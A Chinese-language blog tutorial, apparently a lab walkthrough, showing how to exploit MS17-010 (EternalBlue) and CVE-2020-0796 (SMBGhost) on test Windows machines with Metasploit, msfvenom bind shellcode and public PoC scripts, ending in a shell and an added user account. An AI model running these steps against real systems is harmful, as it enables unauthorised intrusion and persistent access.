445埠用來訪問共享檔案夾,445埠之所以危險,是因為廠商默認開放,
靶機:win7系統 IP:10.0.0.199 提前關閉靶機防火墻
一、MS17-010 永恒之藍
MS微軟,17年,10號漏洞,即新聞上報道的位元幣勒索病毒,
1.進入MSF控制臺:msfconsole
2.找到要利用的漏洞輸入編號(search命令):search ms17-010

3.查看組件串列,選擇要利用的攻擊項(use命令):use 0
4.以為此處提示需要配置Payload,所以按照提示,Tab鍵一次是補全,兩次是出來配置選單,
配置攻擊payload: set payload windows/x64/meterpreter/(兩次tab)

(此處Payload設定為tcp的反向連接)
5.查看模塊配置資訊(帶Yes的是需要配置的):命令:show options
查看能攻擊哪些系統命令:info
需要配置的內容:本地主機IP:LHOST,攻擊的靶機IP:RHOSTS,


5.配置(set命令):
set rhosts 10.0.0.199
回傳上級:back
6.開始攻擊(exploit命令): exploit
7.攻擊成功后提示建立會話,

“?”可查看攻擊專案
例:shell命令進入對方命令列,

此時可在入侵界面操作命令:如創建用戶 net user 123 123 /add
同時win7靶機上顯示創建用戶成功,
二、CVE-2020-0796 永恒之藍2.0
基于SMBv3的漏洞,Windows 8和Windows Server 2012-Windows 10 最新版全部中招,屬于系統級漏洞利用這一漏洞會使系統遭受‘蠕蟲型’攻擊,這意味著很容易從一個受害者感染另一個受害者,一開機就感染,提權后可以做任意操作,例如加密你的檔案勒索你,比如說像 EternalBlue 1.0(永恒之藍 1.0)一樣,加密檔案,對你進行勒索虛擬貨幣,
1.準備
靶機:win10 IP:10.0.0.171
2.攻擊
下載插件

將插件傳入kali系統mnt檔案夾下
在kali主機輸入命令:python3 scanner.py 10.0.0.171

表示Win10中存在該漏洞,
下載另一個插件

將插件傳入kali的mnt檔案夾下
在kali上輸入命令:python3 CVE-2020-0796.py 10.0.0.171

結果出現藍屏

3.第三個工具

(1)msfvenom生成正向連接木馬(只支持正向連接,不支持反向)
(有關msfvenom詳細使用可參考https://www.jianshu.com/p/dee2b171a0a0)
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
![]()
用生成的shellcode將exploit.py中的這一部分替換掉(buf后的字串,保留USER_PAYLOAD不變)

(2)打開kali另一個xshell界面,在msfconsole下:開啟msf監聽
use exploit/multi/handler

因為是反向shell,所以改為正向
set payload windows/x64/meterpreter/bind_tcp

set lport 4444 //監聽埠
set rhost 10.0.0.171 //目標主機
(3)運行exploit.py腳本,反彈shell,切換回第一個xshell界面,運行第一步修改好的腳本


此時得到了shell

如執行增加用戶命令:
net user 123 123 /add
此時win10增加了一個123用戶(密碼123),
三、MS08-067 網路服務器攻擊
同理,不再贅述,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/297760.html
標籤:其他
上一篇:?? 2021數學建模臨時抱佛腳建議,祝各位保底省獎?? (建議收藏)
下一篇:反序列化漏洞與URLDNS利用鏈
